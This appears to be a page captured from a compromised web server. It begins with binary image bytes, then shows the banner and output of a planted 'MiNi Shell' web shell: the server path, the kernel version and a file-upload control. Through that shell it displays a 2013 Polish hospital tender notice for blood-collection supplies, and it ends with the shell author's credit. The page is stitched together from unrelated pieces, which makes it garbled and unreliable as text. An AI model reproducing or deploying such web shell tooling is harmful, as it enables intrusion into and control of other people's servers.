JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130730/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130730/302754-N-2013.html

<p class="kh_header"><b>Włocławek: ZP /8/ 2013</b><br>
<b>Numer ogłoszenia: 302754 - 2013; data zamieszczenia: 30.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Specjalistyczny we Włocławku , Ul. Wieniecka 49, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 54 412 94 13, faks 54 412 94 13.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.wloclawek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZP /8/ 2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> SUKCESYWNA DOSTAWA ELEMENTÓW ZAMKNIĘTEGO SYSTEMU POBIERANIA KRWI,INNYCH PRODUKTÓW ZWIĄZANYCH Z POBIERANIEM, TRANSPORTEM I    PRZECHOWYWANIEM MATERIAŁU BIOLOGICZNEGO ORAZ   WYKONYWANIEM MIKROSKOPOWEJ ANALIZY OSADU MOCZU, w ILOŚCI OKOŁO  500 000 szt. w OKRESIE 12 MIESIĘCY ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.19.25.00-7, 38.00.00.00-5, 38.43.70.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek posiadania takich uprawnień.
 Zamawiający nie wprowadza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadają niezbędną wiedzę i doświadczenie
     - za spełnienie warunku posiadania niezbędnego doświadczenia Zamawiający uzna wykonanie  w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie, co najmniej 3 dostaw  elementów zamkniętego systemu pobierania krwi na kwotę   75 000 zł. ,  w ramach jednego kontraktu - Zadanie 1,  
     Zadanie 2-5 -   Zamawiający nie wprowadza szczegółowego warunku w tym zakresie.
Zamawiający dokona oceny spełnienia warunków wymienionych w pkt. 5.1. podpunktach a - f)  SIWZ na podstawie złożonych wraz z ofertą oświadczeń, dokumentów i wykazów, wymienionych w pkt 6 niniejszej specyfikacji. Każdy warunek zostanie oceniony metodą spełnia - nie spełnia. Wszystkie warunki muszą być spełnione łącznie aby wykonawca spełnił warunki udziału w postępowaniu. Zamawiający dokona wyboru oferty spośród ofert nie podlegających odrzuceniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponują potencjałem technicznym 
Zamawiający nie wprowadza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>osobami zdolnymi do wykonania zamówienia
Zamawiający nie wprowadza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.certyfikaty dopuszczenia wyrobu na terenie Unii Europejskiej.
2.sprzęt musi spełniać warunki ustawy o wyrobach medycznych z dnia 20 maja 2010r. ( Dz. U.  Nr 107, poz. 679 ).- oświadczenie
3.oświadczenia o spełnieniu warunków udziału w postępowaniu na druku, który stanowi  załącznik nr 2 do niniejszej SIWZ,
3. pisemne zobowiązanie innych podmiotów do udostępnienia osób i przedmiotów zdolnych do wykonywania zamówienia, zgodnie z warunkiem określonym w Rozdziale V, pkt. 5.1 ppkt. III, jeżeli Wykonawca wskaże inne pomioty.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>z wykonawcą, który złoży najkorzystniejszą ofertę zostanie podpisana umowa, której wzór stanowi załącznik nr 4 do SIWZ.  Dopuszcza się zgodnie z art. 144 ustawy Prawo zamówień publicznych możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy (w formie aneksu), w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia: 
1)  zmiany spowodowane siłą wyższą uniemożliwiającą wykonanie przedmiotu umowy,
 2) ustawowa zmiana obowiązującej stawki podatku od towarów i usług (VAT),  
 3) urzędowa zmiana cen,
 4) zmiana umowy w postaci aneksu w przypadku kiedy zmiana ta będzie korzystna dla zamawiającego lub gdyby zamawiający miał ponieść niewspółmierną stratę przez zaniechanie zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.wloclawek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Szpital Specjalistyczny
ul. Wieniecka 49
87-800 Włocławek.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.08.2013 godzina 10:00, miejsce: Wojewódzki Szpital Specjalistyczny
ul. Wieniecka 49, pok. 303
87-800 Włocławek.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Probówki do pozyskiwania surowicy z aktywatorem wykrzepiania - poj.  5,0 ml, O ok.13 mm, długość max. 90 mm			7200
2	Probówki do pozyskiwania surowicy z aktywatorem wykrzepiania - poj. około 2,5 ml, O ok.13 mm, długość max. 66 mm	 		31500
3	Probówki do pozyskiwania surowicy z aktywatorem wykrzepiania - poj. około 1,0 ml, O ok.8 mm, długość max. 66 mm 	 		4500
4	Probówki do pozyskiwania surowicy z aktywatorem wykrzepiania i żelem separującym - poj. około 5,0 ml, O ok.13 mm, długość max. 90 mm	 		9000
5	Probówki do pozyskiwania surowicy z aktywatorem wykrzepiania i żelem separującym - poj. około 2,5 ml, O ok.13 mm, długość max. 66 mm	 		36000
6	Probówki do pozyskiwania surowicy z aktywatorem wykrzepiania i żelem separującym - poj. około 1,0 ml, O ok.8 mm, długość max. 66 mm 	 		4500
7	Probówki zawierajace antykoagulant - K3 EDTA - poj. około 2,5 ml, O ok.13 mm, długość max. 66 mm	 		45000
8	Probówki zawierające antykoagulant - K3 EDTA - poj. około 1,0 ml, O ok.8 mm, długość max. 66 mm 	 		13500
9	Probówki do badań koagulologicznych z cytrynianem buforowanym - poj. około 5,0 ml, O ok.11 mm, długość max. 93 mm 	 		3600
10	Probówki do badań koagulologicznych z cytrynianem buforowanym - poj. około 3,0 ml, O ok.11 mm, długość max. 66 mm 	 		31500
11	Probówki do badań koagulologicznych z cytrynianem buforowanym - poj. około 1,5 ml, O ok.8 mm, długość max. 66 mm 	 		4500
12	Probówki do OB z cytrynianem trójsodowym, poj. około 3,5 ml, O około 8 mm, długość max. 93 mm .	 		3600
 	Probówki do OB z cytrynianem trójsodowym, poj. około 2.0 ml, O około 11 mm, długość max. 66 mm wraz z kapilarą do sedymentacji z podziałką i nakrętką zabezpieczającą. 	 		900
13	Probówki do pozyskiwania osocza z heparyną litową  - poj. około 5,0 ml, O ok.13 mm, długość max. 90 mm	 		900
14	Probówki do pozyskiwania osocza z heparyną litową  - poj. około 1,0 ml, O ok.8 mm, długość max. 66 mm 	 		2250
15	Igły systemalne - średnica 0,7 mm	 		5400
16	Igły systemalne - średnica 0,8 mm	 		26100
17	Igły systemalne - średnica 0,9 mm	 		28800
18	Adaptery membranowe do podawania leków.	 		1350
19	Igły systemowe typu motylek do pobierania krwi - średnica 0,8 mm, długość około 19 mm, długość rurki około 60 mm	 		3690
20	Igły systemowe typu motylek do pobierania krwi - średnica 0,9 mm, długość 19 mm, długość rurki  60 mm	 		4590
21	Adaptery do wenflonów.	 		27000
22	Probówki z kapilarami do pozyskiwania krwi włośniczkowej w celu oznaczania stężenia glukozy ( z fluorkiem ) - poj. około 200 ul	 		180
23	Probówki z kapilarami do pozyskiwania krwi włośniczkowej do badania morfologii krwi obwodowej  z EDTA - K  poj. około 200 ul	 		1800
24	Probówki morfologiczne o pojemności około 2.5 ml, zawierająca inny antykoagulant niż tylko EDTA, służąca do diagnostyki pseudotrombpcytopenii.	 		180
25	Adaptery z łopatką do wykonywania preparatów krwi obwodowej	 		180
26	Probówki z kapilarami  do pozyskiwania surowicy z krwi włośniczkowej, zawierające aktywator wykrzepiania - poj. około 200 ul .	 		180
27	Probówki z PP, z zakrętką o pojemnosci około 50 ml ( jałowe )	 		450
28	Probówki z PP, z zakrętką o pojemnosci około 50 ml ( niejałowe ).	 		450
29	Probówki typu Eppendorf neutralne z przejrzystego PP o pojemności 1,5 ml z dnem stożkowym i korkiem z PP.	 		6300
30	Probówki do pozyskiwania krwi żylnej zawierające fluorek + antykoagulant  do oznaczania stężenia glukozy w osoczu krwi żylnej metodą heksokinazową  - poj. około 1,0 ml, O ok.8 mm, długość max. 66 mm.	 		18000
31	Probówki do pozyskiwania krwi żylnej zawierające płynną mieszaninę cytrynian + fluorek  do wykonywania oznaczeń stężenia glukozy w osoczu krwi żylnej metodą heksokinazową, stabilizujace stężenie glukozy w czasie 48 godzin od chwili pobrania  - poj. około 3,0 ml, O ok.10 mm, długość max. 66 mm.	 		1350
32	Probówka z filtrem do pozyskiwania krwi do analiz gazometrycznych we krwi tętniczej i żylnej, z heparyną litową, stabilizowaną jonami wapnia - poj. około 2 ml, sterylizowane, pakowane pojedyńczo.	 		6750
33	probówki z heparyną do pobierania i odwirowywania płynów z jam ciała o pojemności ok. 9 ml			900
34	Kapilary z tworzywa sztucznego stabilizowane jonami wapnia do jednoczesnego pomiaru: gazometrii, oksymetrii, Na+, K+, Cl-, Ca++, kreatyniny, bilirubiny, glukozy, ,mleczanów we krwi włośniczkowej w raz z zatyczkami, mieszadłami, magnesem do mieszania zawartości.
Zatyczki 
Mieszadła
Magnes do mieszania zawartości
	  		     
        7200


         14400
       7200
           9


1	Wszystkie elementy oferowanego systemu pobierania krwi muszą być wytworzone z tworzywa sztucznego.	TAK
2	Wszystkie oferowane produkty muszą pochodzić od jednego producenta.
(w celu zapewnienia kompatybilności i bezpieczeństwa pobierania krwi w systemie  zamkniętym)	TAK
3	Wszystkie oferowane produkty muszą pochodzić od jednego wykonawcy.	TAK
4	Wszystkie oferowane produkty spełniają wymogi ustawy z dnia 20 kwietnia 2004 roku o wyrobach medycznych ( Dz.U.Nr 126, poz. 986 ). 	TAK
5	Dla wszystkich produktów wymagane posiadanie znaku  - CE.	TAK
6	Oferowane produkty zabezpieczają personel przed kontaktem z krwią w trakcie pobierania, transportu i obróbki analitycznej materiału.	TAK
7	Terminy przydatności do użytku liczone od dnia dostarczenia produktu do zamawiającego nie krótsze niż 6 miesięcy	TAK
8	Możliwość pobierania materiału z wykorzystaniem techniki aspiracyjnej i próżniowej	TAK
9	Korki oznaczane jednoznacznie identyfikowalnymi kolorami.	TAK
10	Probówki odporne na uszkodzenia w trakcie transportu i obróbki analitycznej. Gwarancja absolutnej szczelności probówek bez względu na ich położenie.	TAK
11	Adaptery posiadające budowę uniemożliwiającą wyciekanie krwi podczas wymiany strzykawko - probówki.	TAK
12	Bezawaryjna współpraca probówek systemu z różnymi typami analizatorów ( cobas 6000, cobas e-411, STA Compact, cobas b-221, Sysmex XT-1800i, Sysmex XT-4000 ) - oferent poniesie wszelkie koszty związane z koniecznością zastosowania jakichkolwiek adapterów bądź wykonania czynności adaptacyjnych.	TAK
13	Zamknięcia probówek umożliwiające bezpieczne ich otwieranie i zamykanie w trancie wykonywania czynności pre- i postanalitycznych.	TAK
14	Wszystkie probówki wyposażone w fabrycznie naklejane etykiety, umożliwiające zapisywanie danych pacjenta z zastosowaniem typowych : długopisów, cienkopisów itp..	TAK
15	Znaczniki objętości pobieranej krwi na wszystkich probówkach	TAK
16	W okresie trwania umowy Wykonawca zapewni( wydzierżawi ) Zamawiającemu lodówkę, o przedstawionych parametrach do przechowywania opracowanego materiału. Po wygaśnięciu umowy lodówka ta stanie się własnością Zamawiającego.	TAK


Wykonawca dostarczy ( wydzierżawi ) lodówkę laboratoryjną do przechowywania probówko - strzykawek z materiałem badanym, po wykonaniu analiz. 

Lodówka musi odpowiadać następującym wymogom:

1.	Pojemność nie mniejsza niż 350 l.
2.	Wymuszony obieg wewnętrzny powietrza.
3.	Drzwi ze szkła termicznego zaopatrzone w zamek.
4.	Komora wewnętrzna ze stali nierdzewnej.
5.	Agregat hermetyczny.
6.	Zakres temperatur wewnątrz lodówki nie mniejszy niż +2°C - +14°C.
7.	Zewnętrzny wyświetlacz temperatury.
8.	Automatyczne odszranianie.
9.	Kółka do przemieszczania przytwierdzone na stałe.
10.	Akustyczny i wizualny system alarmowy.
11.	Uszczelka magnetyczna drzwi.
12.	Oświetlenie wewnętrzne z niezależnym wyłącznikiem.
13.	Ażurowe półki pokryte plastikiem.
14.	Ilość półek - min. 5..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.25.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Automatyczne nakłuwacze igłowe do pobrań od noworodków i dzieci do lat 6 krwi włośniczkowej niezbędnej do całkowitego wypełnienia kapilary o pojemności min. 200 ul  igła 21G, głębokość nakłucia około 1,8 mm.	 		7000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Stazy automatyczna wielorazowego użytku z plastikowym zapięciem zwalnianym jedną ręką do pobierania krwi żylnej od dorosłych.	 		120
Stazy automatyczna wielorazowego użytku z plastikowym zapięciem zwalnianym jedną ręką do pobierania krwi żylnej od dzieci  tzw. pediatyczna .	 		20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.70.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kamery do analizy osadu moczu typu Fast Read 102 z akrylu z pojedynczą, regularną siatką, o pojemności celki 7 ?l do analizy 10 różnych próbek moczu, pakowane po 100 płytek w opakowaniu ( 1000 celek ).	 		30000
Pipety do kropelkowania osadu moczu o poj. 1 ml, kompatybilne z probówkami stożkowymi o długości około 110 mm i kamerami typu Fast Read 102. Wielkość opakowania - 2000 szt. )	 		32000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.70.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com